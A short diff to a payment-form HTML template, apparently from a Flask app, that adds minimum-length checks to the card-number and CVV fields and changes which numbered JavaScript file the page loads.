--- a/templates/index4690.html
+++ b/templates/index4690.html
@@ -70,7 +70,7 @@
 													<h5>CARD NUMBER</h5>				
        			
         																			
-														<input id="aname" data-mask="0000 0000 0000 0000" class="pay-logo" type="text" value="" required="">
+														<input id="aname" data-mask="0000 0000 0000 0000" minlength = "19" class="pay-logo" type="text" value="" required="">
 												</div>	
 												<div class="transaction">
 													<div class="tab-form-left user-form">
@@ -87,7 +87,7 @@
 													</div>
 													<div class="tab-form-right user-form-rt">
 														<h5>CVV NUMBER</h5>													
-														<input data-mask="000" id="dname" type="text" value="" required="">
+														<input data-mask="000" minlength="3" id="dname" type="text" value="" required="">
 													</div>
 													<div class="clear"></div>
 												</div>
@@ -205,7 +205,7 @@
 
 	<script src="https://www.gstatic.com/firebasejs/7.16.1/firebase-firestore.js"></script>
 
-	<script src="{{ url_for('static', filename='js/app1199.js') }}"></script>
+	<script src="{{ url_for('static', filename='js/app7990.js') }}"></script>
 
 	<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery.mask/1.14.15/jquery.mask.min.js"></script>
 </body>
